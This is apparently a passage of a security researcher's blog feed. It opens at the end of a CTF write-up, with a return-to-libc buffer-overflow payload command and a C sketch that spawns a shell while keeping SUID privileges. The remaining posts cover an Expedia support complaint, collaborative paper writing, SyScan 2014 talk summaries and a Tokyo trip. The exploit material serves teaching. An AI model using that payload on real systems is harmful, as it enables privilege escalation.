PS1='\$ ' SHELL=/bin/sh ./stack_based_overflow `perl -e 'print &amp;quot;A&amp;quot;x16 . &amp;quot;\x80\x84\x04\x08&amp;quot; . &amp;quot;\x70\x84\x04\x08&amp;quot; . &amp;quot;\x9c\xd2\xff\xff&amp;quot;;'`
&lt;/pre&gt;
&lt;p&gt;The interested reader may use execl instead of system to ensure that we don't
lose SUID privileges. Some articles that you might find interesting to follow
up are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="http://phrack.org/issues.html?issue=58&amp;amp;id=4#article"&gt;The original Phrack article on buffer overflows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf"&gt;Bypassing non-executable stack using return-to-libc&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="http://web.stanford.edu/~blp/papers/asrandom.pdf"&gt;On the Effectiveness of Address Space Randomization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Many many more ;)&lt;/li&gt;
&lt;/ul&gt;
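&lt;p&gt;Regarding the execl variant mentioned above: system() runs the command
through /bin/sh -c, which drops SUID privileges on most systems, while a direct
execl keeps them. As a sketch, this is the call we would want to fake on the
stack (depending on the shell you may additionally need its -p flag to keep the
effective uid):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;unistd.h&amp;gt;

int main(void)
{
  /* no shell -c wrapper in between, so the SUID euid survives */
  execl(&amp;quot;/bin/sh&amp;quot;, &amp;quot;sh&amp;quot;, (char *)0);
  return 1;
}
&lt;/pre&gt;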
&lt;/div&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="security"></category></entry><entry><title>Jumping monkeys or how to reach a technical point of contact at an online or tech company</title><link href="/blog/2014/0827-jumping_monkeys.html" rel="alternate"></link><published>2014-08-27T10:09:00-04:00</published><updated>2014-08-27T10:09:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-08-27:/blog/2014/0827-jumping_monkeys.html</id><summary type="html">&lt;p&gt;Do you know this situation where you have some domain specific knowledge about a
problem but first level support at a company blocks you from getting to a
knowledgeable person? An example would be tech support at an internet company
where you have already restarted your modem and computer yet …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Do you know this situation where you have some domain specific knowledge about a
problem but first level support at a company blocks you from getting to a
knowledgeable person? An example would be tech support at an internet company
where you have already restarted your modem and computer yet first level support
insists on you restarting the modem yet again.&lt;/p&gt;
&lt;p&gt;Online companies and tech companies often either have no support at all or only
provide first level non-technical customer support. Google is a good example,
even if you are a customer there's no way for you to reach a technical person
if you run into a bug or problem with your installation. There are many reasons
for companies to follow such a procedure, mostly to avoid engineers losing
time to non-technical user problems. Yet, sometimes a problem that is
reported from the outside should be escalated but isn't.&lt;/p&gt;
&lt;p&gt;I recently ran into a similar problem and am now asking myself how I can make my
voice heard as someone who does not work at that company.&lt;/p&gt;
&lt;p&gt;So, I've been using Expedia.com for a while to book hotels and considered making
them my primary booking engine for hotels. Recently, they updated their homepage
and rewards system so that you get $25 coupons off future bookings, which is a
nice idea. Unfortunately, I cannot access the rewards page (
&lt;a class="reference external" href="http://expedia.com/user/rewards"&gt;http://expedia.com/user/rewards&lt;/a&gt; ). If I'm
logged in I get the following error message: &amp;quot;An Internal Error has occurred&amp;quot; as
shown in the following picture:&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2014/0827/server_error.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The first time I came upon the error (early July) I disabled my Firefox
AdBlocker and found the same error. I then opened an incognito window and tried
again, same error. I figured I'd be a nice guy and sent customer support an
email, telling them that they had an error on their homepage. I got a reply from
their support roughly 1 day later that told me that they are working on the page
and it'll work soon again.&lt;/p&gt;
&lt;p&gt;Three weeks later (and a couple of hotel bookings later) I tried to access the
rewards page again with the same error. This time I got a little suspicious
about what was going on and tested the page both on Chrome and Firefox (on
Ubuntu 14.04) both with and without AdBlock, same result in all 4 cases. I sent
customer support another email:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi there,&lt;/p&gt;
&lt;p&gt;since several weeks (at least 3) I consistently cannot access the
rewards page on expedia ( &lt;a class="reference external" href="https://www.expedia.com/user/rewards"&gt;https://www.expedia.com/user/rewards&lt;/a&gt; ).
Every time I access the site with my account Firefox reports &amp;quot;An
Internal Error has occurred&amp;quot;. Is my account broken or are you still
upgrading?&lt;/p&gt;
&lt;p&gt;Thanks, Mathias&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I got a standard reply that they are upgrading and that they are sorry for my
inconvenience. I figured that they assumed I was just another monkey customer
who misconfigured his computer, so I replied with more explicit information:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi there,&lt;/p&gt;
&lt;p&gt;I don't know if I made my point clear: I cannot access
&lt;a class="reference external" href="https://www.expedia.com/user/rewards"&gt;https://www.expedia.com/user/rewards&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I've been trying to browse to that page using two different browsers
(Firefox and Chrome) repeatedly over the span of 3 weeks. Every time I
access the page an &amp;quot;Internal error&amp;quot; from &lt;em&gt;your&lt;/em&gt; web server is returned!&lt;/p&gt;
&lt;p&gt;The problem appears to be on your side and persists for several weeks
now. I can access the rest of the expedia page without problems.&lt;/p&gt;
&lt;p&gt;Please escalate this problem to web development as there appears to be
a bug somewhere in your programming.&lt;/p&gt;
&lt;p&gt;Thanks,
Mathias&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Again, I got the same reply from 1st level support with an apology for my
inconvenience but no further help. So I waited for roughly one month (travelling
in Europe and setting up camp at Purdue) and tried again. Still the same error.
This time I reproduced the error on two desktops, both running Ubuntu 14.04.1,
one a fresh installation, both on Firefox and Chromium (the open-source version
of Google Chrome). I also verified the bug using Windows 7 and IE7 (using an old
VM I had lying around). Every single time I hit the same bug when browsing to
the rewards page. I assume that there's some bug in their web logic that is
triggered by some weird configuration error in my profile. I wanted to be nice
again and sent &lt;em&gt;another&lt;/em&gt; email to their support:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi there,&lt;/p&gt;
&lt;p&gt;your rewards page is broken for some customers!
This is the 3rd time I'm contacting you regarding this issue; the first two
times (roughly 1 month ago) I got an answer from 1st level customer support that
you are upgrading your website. I've waited for a while and the rewards page (
&lt;a class="reference external" href="https://www.expedia.com/user/rewards"&gt;https://www.expedia.com/user/rewards&lt;/a&gt; ) still results in an &amp;quot;Internal Server
Error&amp;quot; for me. I've tried to access the page using two different browsers
(Chrome and Firefox) under Ubuntu and two browsers (Firefox and IE) under
Windows7 always with the same result.&lt;/p&gt;
&lt;p&gt;I assume that it has something to do with my account or a broken
upgrade/misconfiguration in the database for my user name.&lt;/p&gt;
&lt;p&gt;I need you to forward this message to the development team or 2nd level support
so that they can FIX the problem! Something is broken on YOUR side and I'm
getting seriously annoyed. I'm being nice by telling you about a bug on YOUR
site. It is highly likely that other customers are affected as well!&lt;/p&gt;
&lt;p&gt;Best,
Mathias&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This resulted in a very quick reply (&amp;lt;20min) with the following answer:&lt;/p&gt;
&lt;blockquote&gt;
... We do understand your concerns and should you wish to get in touch with a
supervisor then we would need to have you on the line and kindly provide the
information to expedite the process.
...&lt;/blockquote&gt;
&lt;p&gt;I got stonewalled. I tried to reply two more times but got the same answer. Now
the super frustrating thing is: I &lt;em&gt;know&lt;/em&gt; that their web page contains a bug but
there is no way for me to reach their development team or escalate the question
to the development team.&lt;/p&gt;
&lt;p&gt;I bet I'm not the only one with this problem. To avoid such problems with
services like email, calendar, or rss reader (e.g., formerly offered by Google)
I just run my own cloud on my own server where I have complete control over all
data. But you cannot do this for travel reservations and there are way too many
online-only companies that have no (technical) point of contact (Amazon, or any
other shipping company comes to mind as well).&lt;/p&gt;
&lt;p&gt;Are there any best practices or suggestions on how to reach competent persons
for such tech companies? Would it help to drop titles? I wanted to be nice and
help Expedia but when they stonewall their customers (when it's their fault and
a bug on their side) there's not much you can do other than switch to a different
company. Please share your thoughts and drop me a note via &lt;a class="reference external" href="mailto:mathias.payer&amp;#64;nebelwelt.net"&gt;email&lt;/a&gt; or &lt;a class="reference external" href="https://twitter.com/gannimo"&gt;twitter&lt;/a&gt;.&lt;/p&gt;
</content><category term="Random"></category><category term="Expedia"></category><category term="support"></category></entry><entry><title>On collaborative (remote) paper writing</title><link href="/blog/2014/0504-collaborative-writing.html" rel="alternate"></link><published>2014-05-04T19:09:00-04:00</published><updated>2014-05-04T19:09:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-05-04:/blog/2014/0504-collaborative-writing.html</id><summary type="html">&lt;p&gt;Writing scientific conference or journal papers is an art by itself. This
article is not about writing great papers as there already are many good
articles that focus on paper writing itself and cover technical aspects,
structural aspects, or writing style aspects. In this article I want to give an …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Writing scientific conference or journal papers is an art by itself. This
article is not about writing great papers as there already are many good
articles that focus on paper writing itself and cover technical aspects,
structural aspects, or writing style aspects. In this article I want to give an
overview of collaborative writing and some experiences I had during the last
couple of scientific paper submissions.&lt;/p&gt;
&lt;p&gt;Simple collaborative writing starts in a sequential mode where one party
writes at a time and another party gives feedback or carries out slight changes
to the paper. This simple model fits the adviser and grad student model fairly
well, where the grad student produces individual drafts of a paper and the
adviser gives feedback on each draft. The draft can start off with a vague
description of the actual research project and many research questions might
only be answered along the way, yet the model is very simple and also easy to
coordinate: either push based, where the student explicitly asks for feedback, or
pull based, where the adviser periodically pulls for progress from the student.&lt;/p&gt;
&lt;p&gt;But as soon as either (i) more people join the project, (ii) not all team
members are at the same physical location (i.e., all hands on meetings are no
longer possible or easily possible), or (iii) the collaboration becomes more
interactive it gets more complicated. Some of the questions that arise are:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
* How can we write concurrently on different sections?
* How can we coordinate a common goal or structural changes?
* How do we stay focused and on track?
&lt;/pre&gt;
&lt;p&gt;In my (limited and still very short) experience it makes sense to group the
collaborative writing process into three phases: (i) the brainstorming and
research phase when the project is still very volatile, (ii) the distributed
paper writing phase where the key points are shaped, and (iii) the freeze phase
where individual sections are finished and closed off before the final
submission.&lt;/p&gt;
&lt;div class="section" id="brainstorming-and-research-phase"&gt;
&lt;h2&gt;Brainstorming and research phase&lt;/h2&gt;
&lt;p&gt;During this phase the project is still fresh and very volatile: not all research
questions have to be fully defined yet. A shared document (a wiki page or a
shared Google document) is crucial to fast track this process as it
offers a convenient way to write down notes and a rough design section of the
project. An additional section can cover related work and key differences
between the current project and all other related projects. At this point in
time it does not make sense to write abstract, introduction, conclusion yet, as
the direction of the project might still change.&lt;/p&gt;
&lt;p&gt;As time progresses, the first results of the evaluation can be added into their
own section. This is also a great time to do weekly (or bi-weekly) status
meetings, either via phone call, skype/hangout, or email. This phase progresses
until a couple of weeks before the submission deadline and the results in the
evaluation should improve continuously.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="distributed-paper-writing-phase"&gt;
&lt;h2&gt;Distributed paper writing phase&lt;/h2&gt;
&lt;p&gt;The &amp;quot;hot&amp;quot; paper writing phase starts a couple of weeks (at least 2, ideally 3-5)
before the paper deadline. The existing text is moved from the wiki page (or
Google document) into a source repository and formatted according to the
submission guidelines of the conference (or journal).&lt;/p&gt;
&lt;p&gt;To produce a great final paper I propose a weekly build cycle but you can
obviously adjust the time for each sub task to your needs. Each cycle
consists of the following sub tasks: (i) 4 days of concurrent modifications with
(sub-)section-level locks, (ii) 1 day reading pass, and (iii) asking for
external feedback.&lt;/p&gt;
&lt;div class="section" id="concurrent-modification"&gt;
&lt;h3&gt;Concurrent modification&lt;/h3&gt;
&lt;p&gt;During this task all team members collaborate on the paper and update
individual sections of the paper concurrently. The paper and all files are
already in a source revision system. Most of these systems like git or svn
handle partial concurrent textual changes and simple conflicts even in
monolithic files fairly well (e.g., person A changes the first section while
person B changes the second section concurrently). The discussion of using a
single monolithic file versus per section files is almost religious (just like
vim versus emacs) but I like monolithic files due to, e.g., the simplicity of
moving text around, and the ease of global string replacement.&lt;/p&gt;
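&lt;p&gt;With git, a typical update cycle during this task might look like the
following (file name and commit message are just an example):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
git pull --rebase                        # fetch co-author commits, replay ours on top
vim paper.tex                            # edit only sections we hold the lock for
git commit -am &amp;quot;revise design section&amp;quot;
git push                                 # publish before releasing the lock
&lt;/pre&gt;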
&lt;p&gt;But as soon as two persons change the same section concurrently it becomes very
hard to resolve conflicts. To reduce the risk of conflicts it helps if we use
explicit locks (i.e., only the person that currently holds the lock for a
specific section is allowed to edit and change that section). Depending on the
size of the team different lock strategies are possible. For small teams it
can be advantageous to send explicit emails to all team members, thereby pushing
explicit lock information. If the teams are larger then the amount of emails
explodes and it becomes confusing who currently holds which locks. The wiki page
(or Google document) from the first phase comes to the rescue again: the shared
document can be used to keep track (on a per section basis) who holds which
locks and if all team members acquire/release their locks as they work on their
sections the risk for conflicts is eliminated. The shared document also allows
queuing requests for a lock that is currently taken; depending on the protocol,
the releasing team member can send a direct push email to the person that
continues on that section.&lt;/p&gt;
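&lt;p&gt;Such a lock table in the shared document can be as simple as the following
(names and sections are made up):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Section        Lock holder   Queue
Introduction   Alice         -
Design         Bob           Alice
Evaluation     (free)        -
&lt;/pre&gt;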
&lt;/div&gt;
&lt;div class="section" id="bookkeeping-and-full-passes"&gt;
&lt;h3&gt;Bookkeeping and full passes&lt;/h3&gt;
&lt;p&gt;Every couple of days it makes sense to temporarily freeze all sections to allow
a synchronized reading pass. Team members concurrently read the paper from
beginning to end. In this pass only two kinds of changes are allowed: (i)
fixing typos, phrasing, and wording and (ii) adding &lt;em&gt;todo&lt;/em&gt; notes to individual
sections that are then handled by the team member responsible for that section
in the next concurrent modification pass.&lt;/p&gt;
&lt;p&gt;After each reading pass, every team member commits a list of remaining tasks to
the shared document and lists open questions to be discussed during the next
meeting.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="external-reviews"&gt;
&lt;h3&gt;External reviews&lt;/h3&gt;
&lt;p&gt;At the end of each bookkeeping pass it makes sense to generate a draft and send
it to (i) advisers or more remote team members so that they can give feedback on
the progress as well, (ii) friends who have never read the paper, to get valuable
first-hand comments, and, as soon as the paper is mature enough, (iii) external
reviewers who can give detailed and harsh feedback.&lt;/p&gt;
&lt;p&gt;Depending on the number of passes you can do (i.e., how many weeks you have left
until the deadline) you can spread out your friends and send different drafts
to different sets of friends. But remember that you should not overburden your
colleagues, as they might be working towards the same deadline (and always return
the favor by reviewing papers for them as well), and that each person can only
read a paper for the first time once. This is important because a potential
reviewer will read the paper as a first-time reader without any prior knowledge
of the idea, design, or other background information.&lt;/p&gt;
&lt;p&gt;The feedback from this task is then incorporated during the next concurrent
writing phase. Individual reviews will trickle in asynchronously and can be
discussed on demand.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="freeze-phase"&gt;
&lt;h2&gt;Freeze phase&lt;/h2&gt;
&lt;p&gt;One to two days before the deadline the lead author should start to freeze
sections by marking them as &lt;em&gt;frozen&lt;/em&gt; in the shared locking document. A
frozen section indicates that only the lead author may change any text in that
section, and only after a second person has reviewed the change.&lt;/p&gt;
&lt;p&gt;The last hours before the deadline are always very stressful and human mistakes
tend to pile up. Freezing sections and requiring a two-person review reduces the
risk of human errors and makes the submission process smoother. Also remember to
submit intermediate versions of the paper after every couple of changes, ideally
starting with the first version when you begin freezing sections.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Writing papers is fun, and writing in a big, remote collaboration can be fun
too! Collaboration and team work always bring additional challenges, but they
can be handled if you prepare well and are willing to adhere to a strict regimen:
(i) synchronization is crucial and you should know what the other team members
are doing, (ii) lock pages only work if people actually keep track of the locks,
and (iii) you must keep track of the schedule to send out drafts for
external reviews in time. So enjoy your next collaborative research project!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="paper writing"></category><category term="collaboration"></category></entry><entry><title>SyScan, day 2</title><link href="/blog/2014/0404-SyScan14-day2.html" rel="alternate"></link><published>2014-04-04T21:56:00-04:00</published><updated>2014-04-04T21:56:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-04-04:/blog/2014/0404-SyScan14-day2.html</id><summary type="html">&lt;div class="section" id="breaking-anti-virus-software-joxean-koret"&gt;
&lt;h2&gt;Breaking Anti-Virus Software: Joxean Koret&lt;/h2&gt;
&lt;p&gt;Joxean gave a great introduction into worst security practices at anti virus
companies. He basically dropped a large amount of 0days on a bunch of AV
engines (I liked his opening statement &amp;quot;all bugs are 0days unless otherwise
mentioned&amp;quot;). Using dumb fuzzing Joxean found a …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="breaking-anti-virus-software-joxean-koret"&gt;
&lt;h2&gt;Breaking Anti-Virus Software: Joxean Koret&lt;/h2&gt;
&lt;p&gt;Joxean gave a great introduction to the worst security practices at anti-virus
companies. He basically dropped a large number of 0days on a bunch of AV
engines (I liked his opening statement &amp;quot;all bugs are 0days unless otherwise
mentioned&amp;quot;). Using dumb fuzzing Joxean found a huge number of crashes and then
started diving into the individual engines. He wrote a quick fuzzer himself that
runs on Linux; he runs the scanners either under wine or extracts the core
engine and runs it directly. Some of the worst practices he found are that
many engines (i) disable ASLR for their core libraries, (ii) inject (unsafe)
libraries into all processes, (iii) often run the scan engine as root with full
privileges, and (iv) are full of bugs. So you might want to reconsider trusting
your AV engine to handle untrusted files.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="embracing-the-new-threat-towards-automatically-self-diversifying-malware-mathias-payer"&gt;
&lt;h2&gt;Embracing the New Threat: Towards Automatically Self-Diversifying Malware: Mathias Payer&lt;/h2&gt;
&lt;p&gt;The talk by yours truly. I talked about fully automatic malware diversification.
Using a modified compiler we modify the generated code and static data on a
per-binary basis. The white paper, slides, and code are released &lt;a class="reference external" href="https://github.com/gannimo/MalDiv"&gt;on github&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-to-train-your-snapdragon-exploring-power-regulation-frameworks-on-android-josh-m0nk-thomas"&gt;
&lt;h2&gt;How to Train Your SnapDragon: Exploring Power Regulation Frameworks on Android: Josh 'm0nk' Thomas&lt;/h2&gt;
&lt;p&gt;m0nk introduced a set of nice concepts on how to attack different sets of phones
by tinkering with power regulation and batteries. Unfortunately, I missed most
of the talk; I'll watch it later when it's online!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="click-and-dragger-denial-and-deception-on-android-the-grugq"&gt;
&lt;h2&gt;Click and Dragger: Denial and Deception on Android: the grugq&lt;/h2&gt;
&lt;p&gt;Rockstar on the stage, ranting about phone security: mobile phones suck for
anonymity, privacy, and security. Smartphones suck even more. Location
information (e.g., through triangulation) allows building social graphs,
clustering, and deanonymization of secondary phones if they correlate with other
phones. Networks are just as bad: you can be identified by the numbers you call,
the calls you receive, or your calling pattern. Smartphones add content, GPS
sensors, apps, network connectivity, and so on to the mix.&lt;/p&gt;
&lt;p&gt;To be safe, get burner phones. Buy the phone and SIM separately and well in
advance, use them infrequently, never at home, and throw them away after use.
Smartphones are inherently unsafe. You cannot make Android safer by installing
apps (e.g., TextSecure).&lt;/p&gt;
&lt;p&gt;The grugq presented a new Android mod that is based on CyanogenMod and removes
all Google code. He added a set of tripwires and default return values that
ensure privacy, plus lots of userland hardening, e.g., grsecurity patches,
safe allocators, and so on. As an add-on he presented DarkMatter, a secure app
that allows dynamic per-application TrueCrypt volumes (using encrypted
containers) and transparent access to that data.&lt;/p&gt;
&lt;p&gt;(this was the most awesome talk so far - except mine of course)&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="navigating-a-sea-of-pwn-windows-phone-8-appsec-alex-plaskett-and-nick-walker"&gt;
&lt;h2&gt;Navigating a sea of Pwn?: Windows Phone 8 AppSec: Alex Plaskett and Nick Walker&lt;/h2&gt;
&lt;p&gt;The talk was about Windows Phone hacking and, as expected, Windows Phone
is full of pwn. Great talk about general Windows Phone pen testing.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="all-about-the-alpc-rpc-lpc-lrpc-in-your-pc-alex-ionescu"&gt;
&lt;h2&gt;All about the ALPC, RPC, LPC, LRPC in your PC: Alex Ionescu&lt;/h2&gt;
&lt;p&gt;All the dirty details of different forms of remote or local procedure calls on
Windows using different transport services.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="thunderbolts-and-lightning-very-very-frightening-snare-and-rzn"&gt;
&lt;h2&gt;Thunderbolts and Lightning: Very Very Frightening: Snare and Rzn&lt;/h2&gt;
&lt;p&gt;Thunderbolt is a display port and PCIe bundled together, so the same DMA attacks
as over FireWire a couple of years ago should be possible. They implement the
PCIe interface on an FPGA to capture data that is in flight on the cable. They
run DMA over PCIe and patch the login password check to always return true. Nice!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="linux-memory-forensics-a-real-life-case-study-georg-wicherski"&gt;
&lt;h2&gt;Linux Memory Forensics: A Real-Life Case Study: Georg Wicherski&lt;/h2&gt;
&lt;p&gt;Georg started off with a long introduction to APT, attacks, and a discussion
of the ELF format. Dumping an executable from memory is no easy task, as the
whole binary is not loaded into memory and a lot of the section view is lost
when the individual segments are loaded. In the end Georg wrote a Volatility
plugin that looks for PLT and GOT.PLT sections and compares the entries of the
individual libraries with possibly injected ones.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="whiskeycon"&gt;
&lt;h2&gt;WhiskeyCon&lt;/h2&gt;
&lt;p&gt;Speakers have to drink two shots of whiskey to get 5 minutes of talking time.
Nguyen Anh Quynh presented his Capstone engine, a multi-platform, multi-ISA
disassembly engine. Mark talked about weirdness on the internet: misconfigured
DNS entries, UPnP, telnet, serial ports, and much more; scan all of IPv4 all the
time and add a time component to it. The results are &lt;a class="reference external" href="http://scans.io/"&gt;online&lt;/a&gt;. Rex against the romans was about abuse of power and
attacking Macs (i.e., what kind of malware is running there and how the
droppers work). Miaubiz talked a bit longer about lldb and different hooks.
metl ranted about IT risk management and liability assessment. Joey was just
there for the shots. Yevgeniy talked about abusing malware protections.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="Singapore"></category><category term="hacking"></category><category term="SyScan"></category></entry><entry><title>SyScan, day 1</title><link href="/blog/2014/0403-SyScan14-day1.html" rel="alternate"></link><published>2014-04-03T21:56:00-04:00</published><updated>2014-04-03T21:56:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-04-03:/blog/2014/0403-SyScan14-day1.html</id><summary type="html">&lt;div class="section" id="opening-speech-thomas-lim"&gt;
&lt;h2&gt;Opening speech: Thomas Lim&lt;/h2&gt;
&lt;p&gt;Thomas gave a great introduction, the conference is as big as ever and
attracted a whole bunch of different people. BlackHat Asia is going to
stay in Singapore, so there will be some challenges in the future. Most
speakers on the other hand preferred to drop …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="opening-speech-thomas-lim"&gt;
&lt;h2&gt;Opening speech: Thomas Lim&lt;/h2&gt;
&lt;p&gt;Thomas gave a great introduction: the conference is as big as ever and
attracted a whole bunch of different people. BlackHat Asia is going to
stay in Singapore, so there will be some challenges in the future. Most
speakers, on the other hand, preferred to drop their 0days at SyScan
instead of BH.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="car-hacking-for-poories-charlie-miller-and-chris-valasek"&gt;
&lt;h2&gt;Car Hacking for Poories: Charlie Miller and Chris Valasek&lt;/h2&gt;
&lt;p&gt;Charlie and Chris talked about their great car hacking research on the
cheap. They basically bought a bunch of ECUs off eBay and started wiring
them together, ending up with a fully functional car without the car parts
(i.e., just the electronics). One of the nicer attack vectors is to own
one of these ECUs and start sending CAN bus messages around to, e.g.,
stop the car, accelerate, or turn the steering wheel.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="setup-for-failure-defeating-secureboot-corey-kallenberg"&gt;
&lt;h2&gt;Setup for Failure: Defeating SecureBoot: Corey Kallenberg&lt;/h2&gt;
&lt;p&gt;Corey talked about new ways to bypass UEFI secure boot by temporarily
suppressing SMM. He had a bunch of different exploits that allowed him to
disable the write-protected flash and upload his own rootkit early in
the startup process. Many of the BIOSes currently in use are
broken and most of them can easily be compromised.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mission-mpossible-nils-and-jon-butler"&gt;
&lt;h2&gt;Mission mPOSsible: Nils and Jon Butler&lt;/h2&gt;
&lt;p&gt;Compared to magnetic stripe readers like the ones Square offers, there
are also more sophisticated point-of-sale devices that use chip and
PIN and are supposed to be secure. Nils and Jon bought a couple of
mobile point-of-sale devices and found that they (i) had USB serial
connectors and (ii) were vulnerable to a bunch of command injection
vulnerabilities. Pwned.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="scientific-best-practices-for-recurrent-problems-in-computer-security-r-d-daniel-bilar"&gt;
&lt;h2&gt;Scientific Best Practices for Recurrent Problems in Computer Security R&amp;amp;D: Daniel Bilar&lt;/h2&gt;
&lt;p&gt;Daniel walked us through a large set of talks we should have watched in the
last 1-2 years. He presented research highlights from hacker talks and how those
hacking results were adopted in academia. Adhere to best practices and follow
good statistics and methodologies when developing your research.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="deep-submicron-backdoor-alfredo-ortega"&gt;
&lt;h2&gt;Deep-Submicron Backdoor: Alfredo Ortega&lt;/h2&gt;
&lt;p&gt;Let's add a backdoor into the VLSI code of a chip. What would such a backdoor
look like and what kind of capabilities could we add? Add a small malicious
state machine between the CPU and the memory bus to provide peek/poke
functionality; this lets you implement a debugger. The whole debugger can be
implemented in a few lines of VLSI code. The talk included an awesome 3D flight
through the individual layers of the rendered chip. His second backdoor uses
long pins to emit radio frequencies to send data from the chip to a receiver
outside (basically implementing a neat covert channel). Alfredo included a nice
demo that showed how he can exfiltrate keypress data from a running chip.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="rfidler-adam-laurie"&gt;
&lt;h2&gt;RFIDler: Adam Laurie&lt;/h2&gt;
&lt;p&gt;A project inspired by software defined radio that brings software to RFID. The
idea is to have software-defined RFID tools that allow hacking, tinkering, and
fooling around. Existing tools like Proxmark3 are too complicated and too
expensive. The FUNcube receiver is a great, cheap SDR that one can use to play
around. Development time: 1 hour from seeing a new kind of tag to walking into
the building. RFID should not be used for access control!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="barcon"&gt;
&lt;h2&gt;BarCon&lt;/h2&gt;
&lt;p&gt;After all the main talks were over we headed over to Brewerks to BarCon where we
listened to some more talks while we had some beers (and later food and more
beers).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="expr-ssing-your-heart-s-true-desire-with-lldb-expressions-miaubiz"&gt;
&lt;h2&gt;Expr'ssing Your Heart's True Desire with LLDB Expressions: Miaubiz&lt;/h2&gt;
&lt;p&gt;Miaubiz talked about different LLDB hacks he did to enable a smoother debugging
experience on iOS. Big audio problems stopped this talk from being awesome.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-user-credentials-is-not-only-admin-s-privilege-anton-sapozhnikow"&gt;
&lt;h2&gt;Getting User Credentials is not only Admin's Privilege: Anton Sapozhnikow&lt;/h2&gt;
&lt;p&gt;Anton talked about alternative ways to get access to user credentials (usernames
and passwords) using an indirect loop through the web browser. Nice attack.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="from-new-zealand-with-fail-dean-carter-and-shahn-harris"&gt;
&lt;h2&gt;From New Zealand with Fail: Dean Carter and Shahn Harris&lt;/h2&gt;
&lt;p&gt;Great talk about all the infosec fails that happened in New Zealand in the last
couple of years, lots of laughs and fun!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="Singapore"></category><category term="hacking"></category><category term="SyScan"></category></entry><entry><title>Two crazy days in Tokyo</title><link href="/blog/2014/0329-Two-crazy-days-in-Tokyo.html" rel="alternate"></link><published>2014-03-29T17:54:00-04:00</published><updated>2014-03-29T17:54:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-03-29:/blog/2014/0329-Two-crazy-days-in-Tokyo.html</id><summary type="html">&lt;p&gt;After a couple of rough months interviewing for academic positions
(there's another blog post coming up on this topic, so stay tuned) I
headed off for some well deserved vacation time (and with vacation I
mean a hacker conference, SyScan 2014 in Singapore). As there are no
direct flights from …&lt;/p&gt;</summary><content type="html">&lt;p&gt;After a couple of rough months interviewing for academic positions
(there's another blog post coming up on this topic, so stay tuned) I
headed off for some well deserved vacation time (and with vacation I
mean a hacker conference, SyScan 2014 in Singapore). As there are no
direct flights from San Francisco to Singapore I had to have a layover
either in Hong Kong or in Tokyo. I hadn't visited either place and
Tokyo sounded like much more fun to visit, so I planned a two-day
layover in this weird, crazy city.&lt;/p&gt;
&lt;p&gt;Early on Wednesday I packed my stuff (10 minutes is enough time to pack
for two weeks) and headed to the BART and to the airport. I quickly
enjoyed the lounge at SFO (well, it's a US lounge so you only get
crackers, cheese, and some fruit) and off we went. I was pleasantly
surprised by the international United flight; they had a professional
team on board and the service was really good: plenty of food (2 meals,
and ice cream in between), lots to drink, and a generally nice
atmosphere. I was actually able to work most of the time and relaxed
with some movies in between.&lt;/p&gt;
&lt;p&gt;Immigration to Tokyo was pleasant. I waited for 5-10 minutes, the border
officer did not ask any questions, and I got my tourist visa. From Narita
airport it takes about 1 1/2 hours to reach the main city and I headed
straight to the hotel. When I was looking for the hotel I had my first
